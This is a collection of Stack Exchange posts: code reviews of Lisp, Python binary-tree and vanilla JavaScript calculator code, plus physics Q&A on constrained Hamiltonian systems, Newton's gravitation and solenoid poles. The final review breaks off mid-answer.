(caaadr (assoc 'is-synonym (symbol-value word))))
(t word)))
when if cond
cond is let's say heavy. In many cases code reads better if you use if (if you need both actions, for true and false). And even better when you can use when (when you don't need false action) :)
(defun resolve-word (word)
(if (assoc 'is-synonym (symbol-value word))
(caaadr (assoc 'is-synonym (symbol-value word)))
word))
format
You mix format and princ, why? I can understand you don't like format and prefere princ etc. But be consistent.
equality
equal is only one of many equality checks. In your code it would be better to use eq or string= in many places.
functional programming
loops
loop macro is for iterative programming, not for functional. In functional programming you use recurence. "Little Schemer" is great, practical read on the subject.
global vars
In the essence, every time you call function with the same parameters, it should return the same result. However in your functions you use global variables very often, so behaviour of functions changes in time. It's not functional.
there is...
...a lot more problems with your code. But for the beggining I hope my suggestions are helpful. Best luck with your app! | {
"domain": "codereview.stackexchange",
"id": 29546,
"tags": "functional-programming, lisp"
} |
First class and second class constraints | Question: Hello I am working on a project that involves the constraints. I checkout the paper of Dirac about the constraints as well as some other resources. But still confuse about the first class and second class constraints.
Suppose, from the Lagrangian, I found two primary constraints $\Phi_a$ and $\Phi_b$.
Let $\dot\Phi_a$ and $\dot\Phi_b$ both leads to the secondary constraints $\Sigma_a$ and $\Sigma_b$ respectively.
From the consistency condition $\dot\Sigma_a$ leads to a tertiary constraints $\Theta_a$ but $\dot\Sigma_b$ become zero.
Now How can I check which one of them are first-class and which one of them are second-class?
Answer: (1) You have a set of irreducible constraints, $\lbrace \phi_j\rbrace$, both primary and secondary This set of constraints defines a submanifold $M$ within the "full" (unconstrained) phase space.
(2) A function on the phase space is set to be weakly zero if it vanishes when restricted to the constrained submanifold $M$. A function is called strongly zero if its derivatives with respect to the unconstrained phase space coordinates are weakly zero. By definition the constraints are weakly zero, $\phi_j \approx 0$, but not necessarily strongly zero.
(3) A function $F$ defined on the full phase-space is called a first-class function if its Poisson brackets with all constraints vanish weakly. So $F$ is first class if
$$\lbrace F,\phi_j \rbrace \approx 0
$$
for all constraints $\phi_j$. A function is called second class if it's not first class, i.e. if it has one or more non-weakly vanishing Poisson brackets with the constraints.
(3') Just as a reminder: the derivatives in the Poisson bracket are calculated in the full phase space, i.e. the momenta and coordinates $(p,q)$ are treated as independent, such that you can calculate the derivatives $\delta F/\delta q$ and $\delta F / \delta p$. Then after this differentiation you apply the constraint equations to see if the Poisson bracket vanishes weakly.
(4) Then finally: a constraint is first or second class if all its Poisson bracket with the remaining constraints vanish weakly.
(5) Second class constrained are not too difficult to deal with (i.e. when quantizing the system). First class constraints form a much larger obstacle. They are the generators of gauge transformations.
I can highly recommend the book by Hennaux and Teitelboim. | {
"domain": "physics.stackexchange",
"id": 5755,
"tags": "gauge-theory, field-theory, hamiltonian-formalism, constrained-dynamics"
} |
Direction of magnetic field in a solenoid | Question: Using the right hand rule I struggle to visualise/work out how to tell which is the north and south pole.
It's all so confusing that the right hand rule refers to conventional current not electron so when looking at diagrams it adds to the problem
What is a easy way of finding the north and south poles of a solenoid?
Answer: The north and south pole of a solenoid depends on two factors. One, the direction of the current flow and two, the direction of the winding (clockwise or counter-clockwise). Start by determine the positive pole of the power source (e.g: battery), then the end of the solenoid that you are going to connect to it. Now, looking down the solenoid tube determine what direction is the winding. If clockwise in relation to the positive wire then is the south pole, if anti-clockwise then is the north pole. So, to summarize the magnetic south pole is always clockwise in relation to the positive wire. | {
"domain": "physics.stackexchange",
"id": 49319,
"tags": "electromagnetism, magnetic-fields, conventions, vector-fields"
} |
Work done by non-continuous force | Question: How work done is really understood?
I know that $W=F\cdot d$. I am interested in the meaning of force here i.e.
Is it a continuous force applied till displacement? like the case of pulling trolley bag till displacement $d$ or
can it be non continuous force? Like the case of hitting pool ball with $F$, then ball covers displacement $d$
Answer: The formula $W=Fd$ gives you the work performed by a force $F$ which is acting constantly over a particle as it moves over a distance $d$. The distance that the particle moves after the force stops does not figure into the calculation of work done in any way whatsoever.
Thus, when you throw a ball in the air, you apply a certain upwards force $F_\mathrm{throw}$ over a distance $d_\mathrm{throw}$ of, say about one meter, then during your interaction with the ball you perform the work $F_\mathrm{throw}d_\mathrm{throw}$. The ball then rises to a height $h$ under the action of gravity, which means that gravity performs a work $mgh$ in slowing the ball down to a stop.
With this in mind, the concept of a 'non-continuous force', like the impulsive force felt by a billiard ball when it bounces off of a hard wall, is only an approximation. In any situation like this, there is always some range of motion (often an elastic deformation of one of the bodies involved) which gets neglected, but if you want a full account of the work involved then you need to drop that approximation.
That said, though, the force involved in hitting a billiard ball with a cue is not in this 'non-continuous' class. The impact between the cue and the ball takes a finite (if short) time and covers a finite (if short) distance, so there is no problem in calculating the work performed. | {
"domain": "physics.stackexchange",
"id": 90398,
"tags": "forces, work, definition"
} |
Derivation of Newton's law of gravitation | Question: How did Newton get $F=\frac{Gm_1m_2}{r^2}$?
What is intuition behind it?
What kind of experiment or thought experiment can I do to derive this?
Answer: I'd recommend you read Book III of the Principia by Newton. There he sets out a careful proof based on some methodological rules and observations about planetary and satellite orbit. You might also read Feynman's chapter 7 from book 1 of the Lectures on Physics. He gives a bit more of an intuitive characterization of what is going on in Newton's proposition IV in his proof of universal gravity. The rest of Newton's proof is straightforward. | {
"domain": "physics.stackexchange",
"id": 71507,
"tags": "newtonian-mechanics, forces, newtonian-gravity, orbital-motion, celestial-mechanics"
} |
How to make better maps using gmapping? | Question:
I'm rather new to ROS and using ROS with SLAM for the first time. I'm using a Hokuyo LIDAR and the gmapping package. My maps don't look very good. Specifically, there are two points I'm interested in:
I've adjusted all the gmapping parameters that i can understand (update intervals, laser range, and map resolution--although I'm not even sure i know what map resolution does) but i'm wondering if some of the other parameters are playing a large part in the quality of my maps. Can someone link me to some resources that can help me understand the other parameters better?
The map seems to be changing around the robot such that it only displays what the robot is currently seeing. My understanding was that gmapping worked like this, with the robot sort of moving around a fixed map. What are some steps i can take to get my mapping to operate as it does in that video?
To recap: I'd like to make nice, clean maps, but mine seem very clustered with particles everywhere (perhaps adjusting some filtering parameter can help here) and my map moves around the robot, not the other way around. Can anyone with some more SLAM experience help me out? I'd be happy to post some screenshots of my maps or provide any other info as needed.Thanks
Originally posted by Ryan_F on ROS Answers with karma: 71 on 2017-08-21
Post score: 1
Original comments
Comment by achmad_fathoni on 2018-06-09:
Do you find any resource about better explanation of gmapping parameters?
Answer:
I use a SICK laser scanner and use the default params for gmapping with very good results. I get the best results, however, when I drive around and turn slowly. It can take quite some time (> 45 minutes) to map a large space (> 2000 sq ft) with lots of pathways.
Now, slowly can mean different things for different people (or robots), but roughly it takes a few minutes / 100 sq ft. It also helps to go over problem areas a couple of times.
You may find that the first time you went over an area it doesn't look that great but after the second time it gets adjusted and looks better.
As for finding the right parameters for your robot, this can be more of an art than a science at times. However, if you record your laser scans in a bag file then run gmapping you'll be able to properly tune your system much more systematically and efficiently (by changing the params on the same data until you get optimal results).
In the book Programming Robots with ROS (pg 146), it is suggested to try playing with the following params first:
/slam_gmapping/agularUpdate to 0.1
/slam_gmapping/linearUpdate to 0.1
/slam_gmapping/lskip to 10
/slam_gmapping/xmax to 10
/slam_gmapping/xmin to -10
/slam_gmapping/ymax to 10
/slam_gmapping/ymin to -10
For more parameters and further explanation of the parameters that I listed, check out gmapping on the wiki.
In the video RViz is being used to display the map that gmapping is publishing to the map topic with map set as the fixed frame. If your map is moving around the robot then you probably have the fixed frame set to base_link (or equivalent for your robot).
Originally posted by jayess with karma: 6155 on 2017-08-21
This answer was ACCEPTED on the original site
Post score: 3
Original comments
Comment by gvdhoorn on 2017-08-22:
It might also be worthwhile to look into other mapping components, such as Google Cartographer (in 2D mode). That's not an answer to "how do I improve my gmapping", but gmapping is quite old already, so it might pay to look at more recent developments.
Comment by Ryan_F on 2017-08-25:
Thank you this turned out to be perfect advice! The speed at which i was operating the robot was a large factor in the mapping error. I will look into newer mapping components as well.
Comment by jayess on 2017-08-25:
Great. Glad it helped.
Comment by aarontan on 2018-05-20:
Could you please elaborate on what you mean by "if you record your laser scans in a bag file then run gmapping you'll be able to properly tune your system much more systematically and efficiently (by changing the params on the same data until you get optimal results)
Thanks,
Aaron
Comment by jayess on 2018-05-20:
If you use live data to tune your system then you'll get different results each time, even with the same parameters. If you use the same data, then different results are from the parameters being changed and not the different data. | {
"domain": "robotics.stackexchange",
"id": 28664,
"tags": "ros, slam, navigation, 2d-mapping, gmapping"
} |
At the crossing point of two EM waves - do we have two photons? | Question: At the crossing point of two EM waves - do we have two photons?
Is every single "point" of the wave's occupied volume a potential photon?
Also, can a photon be viewed as "the cross-section" of a radiating EM wave?
Answer:
At the crossing point of two EM waves - do we have two photons?
Short answer: you ask an impossible question but... Kind of.
Wave-particle duality is notoriously hard to interpret. The delayed choice experiment and HOM effect all show rather clearly that one can not just establish a 1:1 mapping between waves and particles and use them interchangeably. Nearly everything that follows is an oversimplification of some kind, and there is a heated debate to this day about the right way of thinking about all this.
Ask yourself this: could you construct a single EM wave such that at any point at time you look at it and say "there are exactly two photons with such and such energies at this point in space"? Generally speaking, the answer would be no: one can only decisively note something about individual photons when they interact with matter. One could not even create your proposed experimental setup with coherent single-photon sources. But, for what it is worth, if there somehow would exist two single-photon wave packets overlapping in a certain region of space and time and someone puts a detector there, they, indeed, would be able to detect two photons. With some probability. Or maybe none - see HOM effect above. In the setup of your question, Delbrück scattering is also an interesting thing to consider: photons actually can interact with each other!
All in all, quantum mechanics is all about statistical qualities and probabilities, and that mindset might be hard to adopt. When considering an individual particle level, preface all your judgements with "with some probability, what we observe would be X": this is the only way the wave-particle duality works.
Is every single "point" of the wave's occupied volume a potential photon
Also, can a photon be viewed as "the cross-section" of a radiating EM wave?
EM waves are composed of wave packets, they are not just sine waves. For the purposes of quantization, anyway. See above how they relate to statistical quantities - in a typical real-world scenario, the number of photons coming from a light source is huge, which is why we treat a technically discrete Planck's distribution as a continuous one.
If you are interested in learning more, I would recommend finding some popular lectures on QED (Feynman's "QED: The Strange Theory of Light and Matter" might be a bit hard, but I do not happen to know a better book for beginners, unfortunately). | {
"domain": "physics.stackexchange",
"id": 86015,
"tags": "photons"
} |
Efficient way of flat mapping a range of a multidimensional random access collection | Question: I've recently answered a question about reading elements from an array of arrays. A way it could be interpreted is that the OP wanted to read a range that could span over multiple subarrays of the 2D array like so :
let a = [["5", "3", ".", ".", "7", "."],
["6", ".", ".", "1", "9", "5"]]
a.lazy.flatMap{$0}[1..<7] ["3", ".", ".", "7", ".", "6"]
This way of reading a range would need to at least flatMap all the previous arrays to the lower bound of the range. Which would be wasteful.
A more natural way would be to only read the needed elements from the original array:
func get<T>(_ range: Range<Int>, from array2d: [[T]]) -> [T]? {
var result: [T] = []
result.reserveCapacity(range.upperBound - range.lowerBound)
var count1 = 0
//Get the index of the first element
guard var low = array2d
.firstIndex(where: {
count1 += $0.count
return range.lowerBound < count1 }),
count1 != 0
else { return nil }
let before = count1 - array2d[low].count
var count2 = before
//Get the index of the last element in the range
guard let high = array2d[low..<array2d.endIndex]
.firstIndex(where: {
count2 += $0.count
return range.upperBound <= count2
}),
count2 != 0
else { return nil }
//Append the elements in the array with the low index
for i in (range.lowerBound - before)..<min(range.upperBound - before, array2d[low].count) {
result.append(array2d[low][i])
}
//If the range spans over multiple arrays
if count1 < count2 {
low += 1
//Append the elements in the arrays with an index between low and high
while low < high {
result.append(contentsOf: array2d[low])
low += 1
}
//Append the elements in the array with the high index
for i in 0..<(range.upperBound - count2 + array2d[high].count) {
result.append(array2d[high][i])
}
}
return result
}
Which could be used like so :
let a = [["0", "1", "2", "3", "4", "5"], ["6", "7"], [], ["8","9","10","11", "12"], ["13","14", "15"]]
get(5..<11, from: a) //Optional(["5", "6", "7", "8", "9", "10"])
get(7..<9, from: a) //Optional(["7", "8"])
To me, the above code feels.. on the border of sanity/maintainability...
What I'd like to do is to make it more generic, maybe as an extension to RandomAccessCollection, and making the flattening process recursive for arrays/collections of arbitrary dimensions. I'm stuck here and not sure if this is the appropriate network to ask such a question.
Feedback on all aspects of the code is welcome, such as (but not limited to):
Efficiency,
Readability,
Naming.
Answer: I gather that your intent was to write a method that iterates through an array of arrays (but avoiding functional patterns), flattening the results in the process such that given...
let a = [["0", "1", "2", "3", "4", "5"], ["6", "7"], [], ["8","9","10","11", "12"], ["13","14", "15"]]
... that result for 5..<10 would be ["5", "6", "7", "8", "9"]
Assuming that’s what you were trying to do, I think you can simplify it:
extension Array {
func flattened<T>(range: Range<Int>) -> [T]? where Element == Array<T> {
var result: [T] = []
var offset = range.startIndex
var length = range.upperBound - range.lowerBound
result.reserveCapacity(length)
for subarray in self {
let subarrayCount = subarray.count
if offset < subarrayCount {
if length > subarrayCount - offset {
result += subarray[offset...]
length -= subarrayCount - offset
} else {
return result + subarray[offset..<offset + length]
}
}
offset = Swift.max(0, offset - subarrayCount)
}
return nil
}
}
In terms of observations on your code:
I wouldn’t advise get method name. It’s not very meaningful name and only conjures up confusion with getters. I’d go with something that captured the “flattening” nature of the routine.
As a general rule, we should avoid closures with side-effects in functional programming patterns. Even though you’ve written an “iterative” rendition of the OP’s code, you’re using a functional method, firstIndex, and you are updating variables outside the closure. It’s technically allowed but is contrary to the spirit of functional programming patterns and is dependent upon the implementation details of firstIndex. | {
"domain": "codereview.stackexchange",
"id": 41781,
"tags": "performance, array, swift, collections"
} |
Does earth itself emit electromagnetic waves? | Question: (.... and if so, of what frequency and amplitude)?
This Skeptics.SE question about nonsense called 'geopathic stress' made me wonder if and how earth itself emits electromagnetic waves.
We need moving charges for that, and I can hardly imagine that things like moving magma or 'moving' radioactive minerals would 'emit' anything, but maybe I'm missing something?
I'm not asking about atmospheric phenomena, or about externally introduced electrical currents (man made, lightning).
Answer: Yes, the earth emits electromagnetic radiation.
It emits infrared radiation with wavelengths of about 1 µm to 1 mm. This is heat, essentially, and much of it radiates into space:
Most if not all of the earth's rocks are radioactive (e.g. because of minerals containing isotopes in the uranium decay chain, such as potassium-40) and emit gamma radiation with wavelengths around $10^{-12}$ m. I'm not sure how much of this radiation would make it through the atmosphere.
You said you're not interested in atmospheric phenomena, but I wonder what the relative contributions of subsurface and atmosphere (e.g. the auroral kilometric radiation), as well as manmade sources, would be to the total signature. The planets emit radio waves (ask a radio astronomer), but I suspect most of that energy is from their atmospheres, since Jupiter and Saturn are especially bright. This book by Vázquez, Pallé and Montañés Rodríguez (2010; Springer) looks like it might address some of this, e.g. in Chapter 4. | {
"domain": "earthscience.stackexchange",
"id": 480,
"tags": "electromagnetism"
} |
expected running time of Randomwalk for k-SAT | Question: model: gambler ruin theorem.
A gambler has $i$ coins initially, in every step, he wins a coin with probability $p$, and loses a coin with probability $1-p$. The expected time that he loses all his coins or wins $n-i$ coins (thus he has $n$ coins totally) is as following:
$$E(i)=-\frac{n}{1-2p}\frac{(\frac{1-p}{p})^i-1}{\frac{1-p}{p})^n-1}+\frac{i}{1-2p}$$
this result is from p272 of https://www.emis.de/journals/AMEN/2018/AMEN-171010.pdf
K-SAT problem
https://cstheory.stackexchange.com/questions/1196/what-is-the-k-sat-problem
Assume that there are $n$ variables in K-SAT.
I use $X=(x_i, x_2, \dots x_n)$ to denote the candidate solution of K-SAT.
$X$ is a vector of $n$ dimensions.
$x_i=1$ means the i-th variable is true, $x_i=0$ means the i-th variable is false.
The algorithm:
Apply gambler ruin theorem to analysis
Assuming there is a unique solution $X^*$, and the initial solution $X$ generated by the algorithm has the same $i$ bits with the unique solution $X^*$.
Apparently, when $i$ becomes $0$ or $n$, the algorithm will stopped, and I want to calculate the expected iterations of the algorithm before it stop.
In each iteration, the same bits can be decrease or increase by 1.
and the probability of increase by 1 is at least $p=1/k$.
(Because it's k-sat, in each unsatisfied clause, there are at least one variables that doesn't match $X^*$)
The number of same bits between $X^*$ and$X$ incrases by 1, corresponding to the gambler wins a coin. And decreasing by 1 corresponding to the gambler lose a coin.
Thus I think I can use
$$E(i)=-\frac{n}{1-2p}\frac{(\frac{1-p}{p})^i-1}{\frac{1-p}{p})^n-1}+\frac{i}{1-2p}$$
to calculate the expected runtime.
but the expected run time is O(n), which is impossible for k-sat problem.
My question is , where am i wrong?
Answer: The probability that step 4 brings $X$ closer to the unique satisfying assignment is not $1/k$. Rather, it is at least $1/k$. When $X$ is far away from a satisfying assignment, the probability is likely to be significantly larger. This makes it quite unlikely that you will ever get to a situation in which $Y$ is close to the unique satisfying assignment.
As a concrete illustration, consider the 2CNF containing all $\binom{n}{2}$ clauses of the form $x_i \lor x_j$ and all $2\binom{n}{2}$ clauses of the form $x_i \lor \bar{x}_j$. The only satisfying assignment has all variables positive. Suppose that the current assignment $X$ contains $d$ negative variables. There are $\binom{n}{2} - \binom{n-d}{2}$ unsatisfied clauses, one for each pair of variables, not both of which are positive. In $\binom{d}{2}$ of them, both literals are false, and in $d(n-d)$, one literal is false. Therefore, the probability that we flip a negative variable is
$$
\frac{\binom{d}{2} \cdot 1 + d(n-d) \cdot \frac{1}{2}}{\binom{d}{2} + d(n-d)} =
\frac{n-1}{2n-d-1} = \frac{1}{2} + \frac{d-1}{2(2n-d-1)}.
$$
When $d$ is linear in $n$, this probability is larger than $1/2$ by a constant.
If we repeat the same calculation for $k$CNFs (we have all clause of width $k$ in which at least one variable is positive), the value of $p$ that we get is
$$
\frac{\frac{1}{k} \sum_{\ell=1}^k \binom{d}{\ell} \binom{n-d}{k-\ell} \ell}{\sum_{\ell=1}^k \binom{d}{\ell} \binom{n-d}{k-\ell}} =
\frac{\frac{d}{k} \sum_{\ell=1}^k \binom{d-1}{\ell-1} \binom{n-d}{k-\ell}}{\sum_{\ell=1}^k \frac{d}{\ell} \binom{d-1}{\ell-1} \binom{n-d}{k-\ell}} =
\frac{\frac{1}{k} \binom{n-1}{k-1}}{\binom{n-1}{k-1} + \sum_{\ell=2}^k \frac{1}{\ell} \binom{d-1}{\ell-1} \binom{n-d}{k-\ell}}.
$$
This expression shows that when $d$ is small, the probability is indeed close to $1/k$. On the other hand, another expression is
$$
\frac{\frac{d}{k} \binom{n-1}{k-1}}{\binom{n}{k} - \binom{n-d}{k}} = \frac{\frac{d}{n} \binom{n}{k}}{\binom{n}{k} - \binom{n-d}{k}} \approx \frac{d}{n} \frac{n^k}{n^k - (n-d)^k} = \frac{d}{n} \frac{1}{1 - (1-d/n)^k}.
$$
When $d \approx \alpha n$ for $\alpha$ satisfying $\alpha/(1-\alpha^k) = 1/2$ (for example, when $k = 3$, we get $\alpha \approx 0.45$), $p$ crosses $1/2$, and so the algorithm will start improving the solution in expectation. Consequently, $X$ is unlikely to have more than $0.46n$ many negative variables.
When analyzing Schöning's algorithm, we keep track of the distance of $X$ from a fixed satisfying assignment. In the analysis, we say that the behavior of $X$ stochastically dominates a biased random walk with constant $p = 1/k$. This means that $X$ behaves better than such a random walk, and so if we show that a $1/k$-biased random walk hits its target with some probability $q$, then it follows that the actual algorithm also finds a satisfying assignment with probability $q$. | {
"domain": "cs.stackexchange",
"id": 19796,
"tags": "complexity-theory, time-complexity, runtime-analysis, satisfiability, random-walks"
} |
IMDB website query to find actors by time period | Question: I'm using data from a database from the IMDB website. The database consists of five relevant tables.
Actor (id, fname, lname, gender)
Movie (id, name, year, rank)
Director (id, fname, lname)
Cast (pid, mid, role)
Movie_Director(did, mid)
It's worth noting that the id column in Actor, Movie & Director tables is a key for the respective table.
Cast.pid refers to Actor.id, and Cast.mid refers to Movie.id.
Here's the prompt and my initial attempt at solving it. Any help in improving/speeding up the query would be greatly appreciated.
/* List all the actors who acted in at least
one film in 2nd half of the 19th century and
in at least one film in the 1st half of the 20th century */
SELECT DISTINCT a.fname, a.lname
FROM Actor a, Movie m1, Movie m2, Cast c1, Cast c2
WHERE c1.pid = a.id
AND c1.mid = m1.id
AND m1.year BETWEEN 1850 AND 1900
AND c2.pid = a.id
AND c2.mid = m2.id
AND m2.year BETWEEN 1901 AND 1950;
Answer: I see some of the same problems as in your last query
Do not use single-letter aliases
a, m1, c1... How about an alias that helps you write the query, instead of one that saves a few characters? That's what they are for, after all.
Old style JOIN
I think you would benefit from reading about explicit JOIN syntax instead of using the pre-ANSI-92 syntax.
Vertical white space
I personally find queries much easier to read if you use line breaks between lists of columns/values/conditions, instead of writing them inline.
Column aliases
It's good practice to rename short/ambiguous/ugly column names to something more human-friendly while presenting the result set. To you it may not matter much, but if you were presenting this report to your boss, they may scratch their head at fname and lname. The syntax for column aliases is the same as table aliases.
That Devil BETWEEN
BETWEEN is ambiguous. You should instead use logical operators.
This is about Microsoft T-SQL, but some problems apply pretty much across the board in SQL.
What do BETWEEN and the devil have in common?
I'll make no bones about it: BETWEEN is evil. For one, the meaning of the word in English does not always match the meaning of the operator in T-SQL. In T-SQL, BETWEEN is an inclusive range - not everyone gets that. Sure, in casual conversation when someone says "between 3 and 6" the answer really could be 3, 4, 5 or 6; but other times, they really mean to restrict the set to only 4 or 5 (an exclusive range).
The reviewed script
SELECT DISTINCT
Actor.fname AS ActorFirstName,
Actor.lname AS ActorLastName,
FROM
Actor -- look no alias needed
INNER JOIN Cast AS OlderCast ON OlderCast.pid = Actor.id
INNER JOIN Movie AS OlderMovie ON OlderCast.mid = OlderMovie.id
INNER JOIN Cast AS NewerCast ON NewerCast.pid = Actor.id
INNER JOIN Movie AS NewerMovie ON NewerCast.mid = NewerMovie.id
WHERE
AND OlderMovie.year >= 1850
AND OlderMovie.year <= 1900
AND NewerMovie.year >= 1901
AND NewerMovie.year <= 1950; | {
"domain": "codereview.stackexchange",
"id": 9425,
"tags": "optimization, performance, sql, mysql"
} |
Best way to store the sum of all node depths? | Question: To sum up all the nodes' depths in any given binary tree, I've written the following recursive algorithm:
def nodeDepths(root):
final=[0]
helper(root,0, final)
return final[0]
def helper(node,d, final):
if not node:
return
final[0]+= d
helper(node.left,d+1, final)
helper(node.right,d+1, final)
class BinaryTree:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
My thinking was: as I see each node, add the depth of that node to the final sum, then recursively call on the left and right with final list as an argument. At the end of the recursive call stack, final[0] should have the right value.
Is there a better way to do this? I have concerns about thread safety in general with global variables but is it a better practice to use global variables in this case?
Answer: PEP8
nodeDepths should be node_depths in snake_case.
Function naming
helper is not a helpful name for a function. If I were to guess what this does, it should maybe be called recurse_node_depths.
Instance methods
As it stands, BinaryTree does not deserve to have an __init__. It would be better-suited as a @dataclass or maybe a named tuple. That said, it probably makes more sense for node_depths to be an instance method where self replaces root.
Integer-by-reference
My first read of this code was wrong. final is only ever going to have one member. My guess is that you did this to effectively pass an integer by reference, but this is a gross hack. Instead, just return the evolving sum as an integer from your recursion, and the uppermost return will be the total that you need.
Slots
Another way to squeeze performance out of this is to initialize __slots__ for BinaryTree based on the three known members.
Recursion
Recursion is not a great idea in Python, for at least two reasons:
Given that there is no indication to the maximum depth of your input tree, you may blow the stack.
Since Python does not have tail recursion optimization, recursion is slower than some other languages.
So you should attempt to reframe this as an iterative implementation. | {
"domain": "codereview.stackexchange",
"id": 38805,
"tags": "python, recursion, binary-tree"
} |
Vanilla JS calculator for learning coding fundamentals | Question: Since I am self taught, I would greatly appreciate some input on my code for this JS calculator:
What redundancies i'm failing to see and remove?
How is my naming for var's and functions? Is it clear or vague?
How is my overall readability? Is what i'm writing even clear, or is it hard to decipher?
Are my comments helpful or redundant?
What stands out to you that needs to be fixed the most?
Just fyi, this code wont run on its own as i have not included the HTML/CSS that accompanies this. I would like to not worry about the front end design in this particular post. All input in appreciated.
const buttons = ['CE', 'AC', 'x', '7', '8', '9', '/', '4', '5', '6',
'-', '1', '2', '3', '+', '0', '.', '='
];
var currentEntry = [],
totalEntry = [];
var equals = true;
//const testNum = /[0-9]/g;
const regexOperands = /[+\-\/x=]/;
const totalArea = document.getElementById("totalArea");
const currentArea = document.getElementById("currentArea");
const numberArea = document.getElementById("numberArea");
const faceHappy = document.getElementById("face-happy");
window.onload = () => {
makeButtons();
}
function applyClick(userInput) { //all our clicking behaviors for buttons
let btn = document.getElementById("b" + userInput);
btn.onclick = () => {
let totalAreaLength = totalArea.textContent.length;
//first we clear the face
changeDisplay(userInput);
if (equals) { //clear after =, or for first entry
if (!isNaN(userInput)) { //if there is pre-existing numbers after hitting equals then delete
currentArea.textContent = '';
} else {
//places total from previous calculation as first entry
currentArea.textContent = totalEntry;
}
totalArea.textContent = '';
currentEntry = [];
totalEntry = [];
equals = false;
}
//first we restrict input length to 17
if (currentArea.textContent.length > 17 || totalArea.textContent.length > 17) {
alert("Number Limit Reached!");
currentArea.textContent = "";
totalArea.textContent = "";
equals = true;
} else if (!isNaN(userInput)) { //test for number
equals = false;
currentArea.textContent = (currentArea.textContent == "0") ? userInput : currentArea.textContent + userInput;
} else if (isNaN(userInput)) { //**for all non numerics**\\
if (equals) { //restricts equals being pressed twice
return;
} else {
if (userInput === "=") { //to get answer
currentEntry = filterUserInput(userInput);
let saveUserInput = currentArea.textContent;
operateOnEntry(currentEntry);
equals = true;
totalEntry = currentEntry[0]; //will save answer for next calculation
currentArea.textContent = saveUserInput; //will display equation
totalArea.textContent = currentEntry; //will display answer
} else if (userInput === ".") {
let lastEntry = filterUserInput(userInput);
if (!lastEntry.includes(".")) { //test for pre-existing period
currentArea.textContent = currentArea.textContent + userInput;
}
} else if (userInput === "AC" || userInput === "CE") {
if (userInput === "AC") {
changeDisplay(userInput);
currentArea.textContent = "";
totalArea.textContent = "";
} else if (userInput === "CE") {
let clearedLastEntry = filterUserInput(userInput);
currentArea.textContent = clearedLastEntry.join('');
}
} else { //this is default operator behavior
let lastEntry = filterUserInput(userInput);
//limits operators from printing if there is a pre-existing operator as last user input
currentArea.textContent = (regexOperands.test(lastEntry)) ? currentArea.textContent : currentArea.textContent + userInput;
}
}
}
}
}
function operateOnEntry(userEntry) {
//this is where the calculations occur when hitting =
let a, b, c, index;
if (userEntry.includes("x")) {
index = userEntry.indexOf('x');
a = Number(userEntry[index - 1]);
b = Number(userEntry[index + 1]);
c = a * b;
userEntry.splice((index - 1), 3, c);
return operateOnEntry(userEntry);
} else if (userEntry.includes("/")) {
index = userEntry.indexOf('/');
a = Number(userEntry[index - 1]);
b = Number(userEntry[index + 1]);
c = a / b;
userEntry.splice((index - 1), 3, c);
return operateOnEntry(userEntry);
} else if (currentEntry.includes("+") || currentEntry.includes("-")) {
index = userEntry[1];
a = Number(userEntry[0]);
b = Number(userEntry[2]);
console.log("index: " + index);
if (index == '+') {
c = a + b;
userEntry.splice(0, 3, c);
return operateOnEntry(userEntry);
} else {
c = a - b;
userEntry.splice(0, 3, c);
return operateOnEntry(userEntry);
}
}
return userEntry;
}
function filterUserInput(userInput) {
//this function converts the user input into an array
let testCurrentEntry;
if (userInput === ".") {
testCurrentEntry = currentArea.textContent.split(regexOperands);
return testCurrentEntry.pop();
} else if (userInput === "=") {
testCurrentEntry = currentArea.textContent; //.split(regexOperands)
testCurrentEntry = testCurrentEntry.split(/([+\-\/x=])/g);
return testCurrentEntry;
} else if (userInput === "CE") {
testCurrentEntry = currentArea.textContent.split("");
testCurrentEntry.pop()
return testCurrentEntry;
} else {
testCurrentEntry = currentArea.textContent.split('');
return testCurrentEntry.pop();
}
}
function changeDisplay(userInput) {
numberArea.style.display = 'block';
if (userInput == 'AC') {
numberArea.style.display = 'none';
faceHappy.style.display = "block";
}
}
function makeButtons() {
for (var i = 0; i < buttons.length; i++) {
var btn = document.createElement("BUTTON");
var t = document.createTextNode(buttons[i]);
var container = document.getElementById('container');
btn.id = "b" + buttons[i];
btn.className = "button";
btn.appendChild(t);
container.appendChild(btn);
applyClick(buttons[i]);
}
}
Answer: Building reusable programs
Just fyi, this code wont run on its own as i have not included the HTML/CSS that accompanies this. I would like to not worry about the front end design in this particular post.
Therein lies the top advice I can give to you. Try this exercise:
Implement the main logic as a module with no UI (ideally unit tested)
Implement a snippet of code that demonstrates using the module, either by using hard-coded parameters, or input from the console
Implement the UI that uses the module, operations triggered by mouse or keyboard events, taking parameters from the events or the DOM
You can do all that without using any frameworks or anything fancy.
Step 1 could go in a single program.js file,
with no code execution in the global scope.
Step 2 could be a function called main in the same file,
and it could be executed in global scope.
At this point the program should be executable by node program.js.
No frameworks used.
By building up your programs this way,
you end up with reusable and testable components.
Your main questions
What redundancies i'm failing to see and remove?
Not a lot, congrats!
In operateOnEntry,
the parsing of the operators have some similar elements,
essentially following the logic:
Find the index of an operator in the input array (which is a mix of numbers and operators)
Apply the operator using as arguments the left and right element
Replace the 3 values in the array with the result of the operation
Repeat until a single value remains
Instead of spelling out the steps for each operator one by one,
you could have a mapping of operators to operations,
loop over the operators according to their precedence,
and follow the common logic as outlined above.
How is my naming for var's and functions? Is it clear or vague?
operateOnEntry doesn't describe well what it does.
What kind of operation? What kind of entry?
It actually evaluates a mathematical expression.
I'd call it evaluate and name its parameter expression,
and have this as a function of an abstraction (prototype) called Calculator.
filterUserInput doesn't describe well what it does.
To "filter" usually means to eliminate some values from the input.
This function takes a string as input,
it operates on some global values,
and returns either an array or a string.
I think this function needs to be redesigned,
naming alone cannot fix its issues.
let a, b, c is clearly not great.
And it's not great to declare variables up front when they can be declared when they are initialized.
I would have used let arg1 = ... and let arg2 = ...,
and use operator(arg1, arg2) inlined without assigning it to let result = ....
Take a look at the different kind of uses of the index variable:
} else if (userEntry.includes("/")) {
index = userEntry.indexOf('/');
a = Number(userEntry[index - 1]);
b = Number(userEntry[index + 1]);
c = a / b;
userEntry.splice((index - 1), 3, c);
return operateOnEntry(userEntry);
} else if (currentEntry.includes("+") || currentEntry.includes("-")) {
index = userEntry[1];
a = Number(userEntry[0]);
b = Number(userEntry[2]);
console.log("index: " + index);
if (index == '+') {
The first use is good, it indicates the index of an array.
In the second use it's not actually an index, but something else.
Not related to naming, but to using variables, consider this:
testCurrentEntry = currentArea.textContent; //.split(regexOperands)
testCurrentEntry = testCurrentEntry.split(/([+\-\/x=])/g);
After the first assignment, testCurrentEntry has a string value.
